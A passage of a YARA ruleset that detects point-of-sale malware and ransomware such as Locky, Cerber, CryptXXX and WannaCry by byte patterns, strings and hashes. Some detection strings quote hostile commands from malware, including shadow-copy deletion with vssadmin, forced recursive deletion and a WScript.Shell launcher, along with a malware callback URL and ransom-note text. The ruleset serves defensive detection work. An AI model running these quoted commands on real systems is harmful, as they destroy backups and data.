condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ rule POS_bruteforcing_bot { meta: maltype = "botnet" ref = "https://github.com/reed1713" reference = "http://www.alienvault.com/open-threat-exchange/blog/botnet-bruteforcing-point-of-sale-via-remote-desktop" date = "3/11/2014" description = "botnet bruteforcing POS terms via RDP" strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="\\AppData\\Roaming\\lsacs.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule easterjackpos { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-09-02" description = "Identify JackPOS" strings: $s1 = "updateinterval=" $s2 = "cardinterval=" $s3 = "{[!17!]}{[!18!]}" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule PoS_Malware_fastpos : FastPOS POS keylogger { meta: author = "Trend Micro, Inc." date = "2016-05-18" description = "Used to detect FastPOS keyloggger + scraper" reference = "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" sample_filetype = "exe" strings: $string1 = "uniqyeidclaxemain" $string2 = "http://%s/cdosys.php" $string3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" $string4 = "\\The Hook\\Release\\The Hook.pdb" nocase condition: all of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule LogPOS { meta: author = "Morphick Security" description = "Detects Versions of LogPOS" md5 = "af13e7583ed1b27c4ae219e344a37e2b" strings: $mailslot = "\\\\.\\mailslot\\LogCC" $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process=" //64A130000000 mov eax, dword ptr fs:[0x30] //8B400C mov eax, dword ptr [eax + 0xc] //8B401C mov eax, dword ptr [eax + 0x1c] //8B4008 mov eax, dword ptr [eax + 8] $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 } condition: $sc and 1 of ($mailslot,$get) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule PoS_Malware_MalumPOS { meta: author = "Trend Micro, Inc." date = "2015-05-25" description = "Used to detect MalumPOS memory dumper" sample_filtype = "exe" strings: $string1 = "SOFTWARE\\Borland\\Delphi\\RTL" $string2 = "B)[0-9]{13,19}\\" $string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\" $string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]" $string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/ condition: all of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Mozart { meta: author = "Nick Hoffman - Morphick Inc" description = "Detects samples of the Mozart POS RAM scraping utility" reference = "http://securitykitten.github.io/the-mozart-ram-scraper/" strings: $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" nocase wide ascii $output = {67 61 72 62 61 67 65 2E 74 6D 70 00} $service_name = "NCR SelfServ Platform Remote Monitor" nocase wide ascii $service_name_short = "NCR_RemoteMonitor" $encode_data = {B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 
8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00} condition: any of ($pdb, $output, $encode_data) or all of ($service*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ransom_CryptXXX_Dropper { /* Regla para detectar el dropper de Ransom.CryptXXX con MD5 d01fd2bb8c6296d51be297978af8b3a1 */ meta: description = "Regla para detectar RANSOM.CRYPTXXX" author = "CCN-CERT" version = "1.0" ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html" strings: $a = { 50 65 31 57 58 43 46 76 59 62 48 6F 35 } $b = { 43 00 3A 00 5C 00 42 00 49 00 45 00 52 00 5C 00 51 00 6D 00 6B 00 4E 00 52 00 4C 00 46 00 00 } condition: all of them } rule Ransom_CryptXXX_Real { /* Regla para detectar el codigo Ransom.CryptXXX fuera del dropper con MD5 ae06248ab3c02e1c2ca9d53b9a155199 */ meta: description = "Regla para detectar Ransom.CryptXXX original" author = "CCN-CERT" version = "1.0" ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html" strings: $a = { 52 59 47 40 4A 41 59 5D 52 00 00 00 FF FF FF FF } $b = { 06 00 00 00 52 59 47 40 40 5A 00 00 FF FF FF FF } $c = { 0A 00 00 00 52 5C 4B 4D 57 4D 42 4B 5C 52 00 00 } $d = { FF FF FF FF 0A 00 00 00 52 5D 57 5D 5A 4B 43 70 } $e = { 3F 52 00 00 FF FF FF FF 06 00 00 00 52 4C 41 41 } $f = { 
5A 52 00 00 FF FF FF FF 0A 00 00 00 52 5C 4B 4D } $g = { 41 58 4B 5C 57 52 00 00 FF FF FF FF 0E 00 00 00 } $h = { 52 2A 5C 4B 4D 57 4D 42 4B 20 4C 47 40 52 00 00 } $i = { FF FF FF FF 0A 00 00 00 52 5E 4B 5C 48 42 41 49 } $j = { 5D 52 00 00 FF FF FF FF 05 00 00 00 52 4B 48 47 } $k = { 52 00 00 00 FF FF FF FF 0C 00 00 00 52 4D 41 40 } $l = { 48 47 49 20 43 5D 47 52 00 00 00 00 FF FF FF FF } $m = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3F 52 00 00 } $n = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 } $o = { 3C 52 00 00 FF FF FF FF 08 00 00 00 52 49 41 41 } $p = { 49 42 4B 52 00 00 00 00 FF FF FF FF 06 00 00 00 } $q = { 52 5A 4B 43 5E 52 00 00 FF FF FF FF 08 00 00 00 } $v = { 52 48 3A 4C 4D 70 3F 52 00 00 00 00 FF FF FF FF } $w = { 0A 00 00 00 52 4F 42 42 5B 5D 4B 70 3F 52 00 00 } $x = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 } $y = { 3F 52 00 00 FF FF FF FF 0A 00 00 00 52 5E 5C 41 } $z = { 49 5C 4F 70 3C 52 00 00 FF FF FF FF 09 00 00 00 } $aa = { 52 4F 5E 5E 4A 4F 5A 4F 52 00 00 00 FF FF FF FF } $ab = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3D 52 00 00 } $ac = { FF FF FF FF 08 00 00 00 52 5E 5B 4C 42 47 4D 52 } condition: all of them } rule legion_777 { meta: author = "Daxda (https://github.com/Daxda)" date = "2016/6/6" description = "Detects an UPX-unpacked .777 ransomware binary." ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion" category = "Ransomware" sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548" strings: $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php" $s2 = "read_this_file.txt" wide // Ransom note filename. $s3 = "seven_legion@india.com" // Part of the format string used to rename files. $s4 = {46 4f 52 20 44 45 43 52 59 50 54 20 46 49 4c 45 53 0d 0a 53 45 4e 44 20 4f 4e 45 20 46 49 4c 45 20 49 4e 20 45 2d 4d 41 49 4c 0d 0a 73 65 76 65 6e 5f 6c 65 67 69 6f 6e 40 69 6e 64 69 61 2e 63 6f 6d } // Ransom note content. 
$s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777" // Renaming format string. condition: 4 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ransom_Alpha { meta: description = "Regla para detectar Ransom.Alpha (posibles falsos positivos)" author = "CCN-CERT" version = "1.0" strings: $a = { 52 00 65 00 61 00 64 00 20 00 4D 00 65 00 20 00 28 00 48 00 6F 00 77 00 20 00 44 00 65 00 63 } condition: $a } rule Ransom_Alfa { meta: description = "Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos)" author = "CCN-CERT" version = "1.0" strings: $a = { 8B 0C 97 81 E1 FF FF 00 00 81 F9 19 04 00 00 74 0F 81 F9 } $b = { 22 04 00 00 74 07 42 3B D0 7C E2 EB 02 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule cerber3{ meta: author = "pekeinfo" date = "2016-09-09" description = "Cerber3 " strings: $a = {00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85} $b = {68 3B DB 00 00 ?? ?? ?? ?? 00 ?? FF 15} condition: 1 of them } rule cerber4{ meta: author = "pekeinfo" date = "2016-09-09" description = "Cerber4" strings: $a = {8B 0D ?? ?? 43 00 51 8B 15 ?? ?? 43 00 52 E8 C9 04 00 00 83 C4 08 89 45 FC A1 ?? ?? 43 00 3B 05 ?? ?? 43 00 72 02} condition: 1 of them } rule cerber5{ meta: author = "pekeinfo" date = "2016-12-02" description = "Cerber5" strings: $a = {83 C4 04 A3 ?? ?? ?? 00 C7 45 ?? ?? ?? ?? 00 8B ?? ?? C6 0? 56 8B ?? ?? 5? 68 ?? ?? 4? 00 FF 15 ?? ?? 4? 00 50 FF 15 ?? ?? 4? 00 A3 ?? ?? 4? 00 68 1D 10 00 00 E8 ?? ?? FF FF 83 C4 04 ?? ?? ??} condition: 1 of them } rule cerber5b{ meta: author = "pekeinfo" date = "2016-12-20" description = "Cerber5b" strings: $a={8B ?? ?8 ?? 4? 00 83 E? 02 89 ?? ?8 ?? 4? 00 68 ?C ?9 4? 00 [0-6] ?? ?? ?? ?? ?? ?8 ?? 4? 00 5? FF 15 ?? 
?9 4? 00 89 45 ?4 83 7D ?4 00 75 02 EB 12 8B ?? ?0 83 C? 06 89 ?? ?0 B? DD 03 00 00 85} condition: $a } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule ransom_comodosec_mrcr1 { meta: author = " J from THL <j@techhelplist.com>" date = "2017/01" reference = "https://virustotal.com/en/file/75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa/analysis/" version = 1 maltype = "Ransomware" filetype = "memory" strings: $text01 = "WebKitFormBoundary" $text02 = "Start NetworkScan" $text03 = "Start DriveScan" $text04 = "Start CryptFiles" $text05 = "cmd /c vssadmin delete shadows /all /quiet" $text06 = "isAutorun:" $text07 = "isNetworkScan:" $text08 = "isUserDataLast:" $text09 = "isCryptFileNames:" $text10 = "isChangeFileExts:" $text11 = "isPowerOffWindows:" $text12 = "GatePath:" $text13 = "GatePort:" $text14 = "DefaultCryptKey:" $text15 = "UserAgent:" $text16 = "Mozilla_" $text17 = "On Error Resume Next" $text18 = "Content-Disposition: form-data; name=\"uid\"" $text19 = "Content-Disposition: form-data; name=\"uname\"" $text20 = "Content-Disposition: form-data; name=\"cname\"" $regx21 = /\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|/ condition: 10 of them } rule Ransom : Crypren{ meta: weight = 1 Author = "@pekeinfo" reference = "https://github.com/pekeinfo/DecryptCrypren" strings: $a = "won't be able to recover your files anymore.</p>" $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? 
??} $c = "Please restart your computer and wait for instructions for decrypting your files" condition: any of them } rule cryptonar_ransomware { meta: description = "Rule to detect CryptoNar Ransomware" author = "Marc Rivero | @seifreed" reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/" strings: $s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii $s2 = "CryptoNarDecryptor.exe" fullword wide $s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii $s4 = "Do not delete this file, else the decryption process will be broken" fullword wide $s5 = "key you received, and wait until the decryption process is done." fullword ascii $s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii $s7 = "Decryption process failed" fullword wide $s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii $s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii $s10 = "johnsmith987654@tutanota.com" fullword wide $s11 = "Decryption process will start soon" fullword wide $s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii $s13 = "DecryptionProcessProgressBar" fullword wide $s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/ import "pe" rule CryptoLocker_set1 { meta: author = "Christiaan Beek, Christiaan_Beek@McAfee.com" date = "2014-04-13" description = "Detection of Cryptolocker Samples" strings: $string0 = "static" $string1 = " kscdS" $string2 = "Romantic" $string3 = "CompanyName" wide $string4 = "ProductVersion" wide $string5 = "9%9R9f9q9" $string6 = "IDR_VERSION1" wide $string7 = " </trustInfo>" $string8 = "LookFor" wide $string9 = ":n;t;y;" $string10 = " <requestedExecutionLevel level" $string11 = "VS_VERSION_INFO" wide $string12 = "2.0.1.0" wide $string13 = "<assembly xmlns" $string14 = " <trustInfo xmlns" $string15 = "srtWd@@" $string16 = "515]5z5" $string17 = "C:\\lZbvnoVe.exe" wide condition: 12 of ($string*) } rule CryptoLocker_rule2 { meta: author = "Christiaan Beek, Christiaan_Beek@McAfee.com" date = "2014-04-14" description = "Detection of CryptoLocker Variants" strings: $string0 = "2.0.1.7" wide $string1 = " <security>" $string2 = "Romantic" $string3 = "ProductVersion" wide $string4 = "9%9R9f9q9" $string5 = "IDR_VERSION1" wide $string6 = "button" $string7 = " </security>" $string8 = "VFileInfo" wide $string9 = "LookFor" wide $string10 = " </requestedPrivileges>" $string11 = " uiAccess" $string12 = " <trustInfo xmlns" $string13 = "last.inf" $string14 = " manifestVersion" $string15 = "FFFF04E3" wide $string16 = "3,31363H3P3m3u3z3" condition: 12 of ($string*) } rule SVG_LoadURL { meta: description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)" author = "Florian Roth" reference = "http://goo.gl/psjCCc" date = "2015-05-24" hash1 = "ac8ef9df208f624be9c7e7804de55318" hash2 = "3b9e67a38569ebe8202ac90ad60c52e0" hash3 = "7e2be5cc785ef7711282cea8980b9fee" hash4 = "4e2c6f6b3907ec882596024e55c2b58b" score = 50 strings: $s1 = "</svg>" nocase $s2 = "<script>" nocase $s3 = "location.href='http" nocase condition: all of ($s*) and filesize < 600 } rule BackdoorFCKG: CTB_Locker_Ransomware { meta: author = "ISG" date = "2015-01-20" reference = 
"https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker" description = "CTB_Locker" strings: $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $string2 = "keme132.DLL" $string3 = "klospad.pdb" condition: 3 of them } //more info at reversecodes.wordpress.com rule DMALocker : ransom { meta: Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0" ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/" Author = "SadFud" Date = "30/05/2016" strings: $uno = { 41 42 43 58 59 5a 31 31 } $dos = { 21 44 4d 41 4c 4f 43 4b } $tres = { 21 44 4d 41 4c 4f 43 4b 33 2e 30 } $cuatro = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 } condition: any of them } //More at reversecodes.wordpress.com rule DMALocker4 : ransom { meta: Description = "Deteccion del ransomware DMA Locker version 4.0" ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/" Author = "SadFud" Date = "30/05/2016" Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1" strings: $clave = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 } condition: $clave } rule DoublePulsarXor_Petya { meta: description = "Rule to hit on the XORed DoublePulsar shellcode" author = "Patrick Jones" company = "Booz Allen Hamilton" reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html" reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf" date = "2017-06-28" hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745" hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1" strings: $DoublePulsarXor_Petya = { FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE } condition: $DoublePulsarXor_Petya } rule 
DoublePulsarDllInjection_Petya { meta: description = "Rule to hit on the XORed DoublePulsar DLL injection shellcode" author = "Patrick Jones" company = "Booz Allen Hamilton" reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html" reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf" date = "2017-06-28" hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745" hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1" strings: $DoublePulsarDllInjection_Petya = { 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC 33 33 33 84 47 49 CC 33 33 33 84 47 41 } condition: $DoublePulsarDllInjection_Petya } rule Erebus: ransom { meta: description = "Erebus Ransomware" author = "Joan Soriano / @joanbtl" date = "2017-06-23" version = "1.0" MD5 = "27d857e12b9be5d43f935b8cc86eaabf" SHA256 = "0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f" ref1 = "http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" strings: $a = "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" $b = "EREBUS IS BEST." condition: all of them } rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty { meta: author = "McAfee Labs" description = "Detect GPGQwerty ransomware" reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/" strings: $a = "gpg.exe –recipient qwerty -o" $b = "%s%s.%d.qwerty" $c = "del /Q /F /S %s$recycle.bin" $d = "cryz1@protonmail.com" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

rule GoldenEye_Ransomware_XLS
{
    // Maldoc stage of GoldenEye: an OLE2 compound file (0xcfd0 is the
    // little-endian uint16 view of the D0 CF 11 E0 header) under 4000KB that
    // contains either of two JScript fragments — one renames a temp-file name
    // from .tmp to .exe, the other launches it through WScript.Shell.
    meta:
        description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
        author = "Florian Roth"
        reference = "https://goo.gl/jp2SkT"
        date = "2016-12-06"
        hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
    strings:
        $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
        // The string stops mid-argument ("shell.run(t'") in the source rule;
        // kept as is, since widening it would change what the rule matches.
        $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
    condition:
        ( uint16(0) == 0xcfd0 and filesize < 4000KB and 1 of them )
}

rule GoldenEyeRansomware_Dropper_MalformedZoomit
{
    // PE ("MZ") under 800KB carrying the Sysinternals ZoomIt banner while the
    // wide "Mark Russinovich" string is absent. $n1 is an exclusion string: the
    // rule relies on a genuine ZoomIt build carrying that credit — presumably
    // true, but verify before tuning the rule.
    meta:
        description = "Auto-generated rule - file b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
        author = "Florian Roth"
        reference = "https://goo.gl/jp2SkT"
        date = "2016-12-06"
        hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
    strings:
        $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
        $n1 = "Mark Russinovich" wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

/* Yara Rule Set Author: Florian Roth Date: 2016-02-17 Identifier: Locky */

rule Locky_Ransomware : ransom
{
    // Two short code byte-sequences taken from a Locky sample; both must be
    // present. The description itself notes that Win32/Kuluoz also matches, so
    // treat a hit as a lead to confirm rather than a verdict.
    meta:
        description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
        author = "Florian Roth (with the help of binar.ly)"
        reference = "https://goo.gl/qScSrE"
        date = "2016-02-17"
        hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
    strings:
        // The trailing comments record where each sequence sits in the
        // reference sample. They must stay on their own lines: collapsed onto
        // one line, a "//" comment would swallow the rest of the rule.
        $o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } // address=0x4144a7
        $o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } // address=0x413863
    condition:
        all of ($o*)
}

rule Locky_Ransomware_2: ransom
{
    // Hex-encoded UTF-16LE fragments of Locky's artefact names, cut at
    // arbitrary byte boundaries (hence the stray leading/trailing 00 bytes):
    //   $a1          ".locky"                          (encrypted-file extension)
    //   $a2 .. $a6   "_Locky_recover_instructions.txt" (ransom-note file name)
    //   $a7          ASCII "Software\Locky" + NUL     (likely a registry key path)
    // Every fragment is required.
    meta:
        description = "Regla para detectar RANSOM.LOCKY"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $a1 = { 2E 00 6C 00 6F 00 63 00 6B 00 79 00 00 }
        $a2 = { 00 5F 00 4C 00 6F 00 63 00 6B 00 79 00 }
        $a3 = { 5F 00 72 00 65 00 63 00 6F 00 76 00 65 }
        $a4 = { 00 72 00 5F 00 69 00 6E 00 73 00 74 00 }
        $a5 = { 72 00 75 00 63 00 74 00 69 00 6F 00 6E }
        $a6 = { 00 73 00 2E 00 74 00 78 00 74 00 00 }
        $a7 = { 53 6F 66 74 77 61 72 65 5C 4C 6F 63 6B 79 00 }
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// NOTE(review): "pe" is imported here but the rule that follows does not
// reference pe.*; the import is unused (harmless, kept for compatibility).
import "pe"

rule MS17_010_WanaCry_worm
{
    // WannaCry spreader: the five $ms17010_* strings are SMB dialect names and
    // the two template placeholders from the embedded exploit packets; the
    // three $wannacry_payload_* strings are substrings of the embedded payload.
    // All eight must be present, so this is deliberately narrow.
    meta:
        description = "Worm exploiting MS17-010 and dropping WannaCry Ransomware"
        author = "Felipe Molina (@felmoltor)"
        reference = "https://www.exploit-db.com/exploits/41987/"
        date = "2017/05/12"
    strings:
        // SMB Negotiate dialect strings as they appear in the exploit's packets.
        $ms17010_str1="PC NETWORK PROGRAM 1.0"
        $ms17010_str2="LANMAN1.0"
        $ms17010_str3="Windows for Workgroups 3.1a"
        // Placeholders the worm presumably patches into its SMB templates at
        // runtime (inferred from the names).
        $ms17010_str4="__TREEID__PLACEHOLDER__"
        $ms17010_str5="__USERID__PLACEHOLDER__"
        // Opaque substrings of the embedded payload; their origin is not
        // documented in the rule.
        $wannacry_payload_substr1 = "h6agLCqPqVyXi2VSQ8O6Yb9ijBX54j"
        $wannacry_payload_substr2 = "h54WfF9cGigWFEx92bzmOd0UOaZlM"
        $wannacry_payload_substr3 = "tpGFEoLOU6+5I78Toh/nHs/RAP"
    condition:
        all of them
}

/* Four YARA rules to check for payloads on systems.
Thanks to sinkholing, encyrption may not occur, BUT you may still have binaries lying around. If you get a match for "WannaDecryptor" and not for Wanna_Sample, then you may have a variant! Check out http://yara.readthedocs.io on how to write and add a rule as below and index your rule by the sample hashes. Add, share, rinse and repeat! */ rule WannaDecryptor: WannaDecryptor { meta: description = "Detection for common strings of WannaDecryptor" strings: $id1 = "taskdl.exe" $id2 = "taskse.exe" $id3 = "r.wnry" $id4 = "s.wnry" $id5 = "t.wnry" $id6 = "u.wnry" $id7 = "msg/m_" condition: 3 of them } rule Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549: Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549 { meta: description = "Specific sample match for WannaCryptor" MD5 = "84c82835a5d21bbcf75a61706d8ab549" SHA1 = "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" SHA256 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" INFO = "Looks for 'taskdl' and 'taskse' at known offsets" strings: $taskdl = { 00 74 61 73 6b 64 6c } $taskse = { 00 74 61 73 6b 73 65 } condition: $taskdl at 3419456 and $taskse at 3422953 } rule Wanna_Sample_4da1f312a214c07143abeeafb695d904: Wanna_Sample_4da1f312a214c07143abeeafb695d904 { meta: description = "Specific sample match for WannaCryptor" MD5 = "4da1f312a214c07143abeeafb695d904" SHA1 = "b629f072c9241fd2451f1cbca2290197e72a8f5e" SHA256 = "aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c" INFO = "Looks for offsets of r.wry and s.wry instances" strings: $rwnry = { 72 2e 77 72 79 } $swnry = { 73 2e 77 72 79 } condition: $rwnry at 88195 and $swnry at 88656 and $rwnry at 4495639 } rule NHS_Strain_Wanna: NHS_Strain_Wanna { meta: description = "Detection for worm-strain bundle of Wcry, DOublePulsar" MD5 = "db349b97c37d22f5ea1d1841e3c89eb4" SHA1 = "e889544aff85ffaf8b0d0da705105dee7c97fe26" SHA256 = "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" INFO = "Looks for specific offsets of c.wnry and t.wnry strings" strings: 
$cwnry = { 63 2e 77 6e 72 79 } $twnry = { 74 2e 77 6e 72 79 } condition: $cwnry at 262324 and $twnry at 267672 and $cwnry at 284970 } rule ransom_telefonica : TELEF { meta: author = "Jaume Martin <@Xumeiquer>" description = "Ransmoware Telefonica" date = "2017-05-13" reference = "http://www.elmundo.es/tecnologia/2017/05/12/59158a8ce5fdea194f8b4616.html" md5 = "7f7ccaa16fb15eb1c7399d422f8363e8" sha256 = "2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd" strings: $a = "RegCreateKeyW" wide ascii nocase $b = "cmd.exe /c" $c = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" ascii $d = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" ascii $e = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" ascii $f = "tasksche.exe" condition: uint16(0) == 0x5A4D and $a and for all of ($b, $c, $d, $e, $f) : (@ > @a) } rule Wanna_Cry_Ransomware_Generic { meta: description = "Detects WannaCry Ransomware on Disk and in Virtual Page" author = "US-CERT Code Analysis Team" reference = "not set" date = "2017/05/12" hash0 = "4DA1F312A214C07143ABEEAFB695D904" strings: $s0 = {410044004D0049004E0024} $s1 = "WannaDecryptor" $s2 = "WANNACRY" $s3 = "Microsoft Enhanced RSA and AES Cryptographic" $s4 = "PKS" $s5 = "StartTask" $s6 = "wcry@123" $s7 = {2F6600002F72} $s8 = "unzip 0.15 Copyrigh" 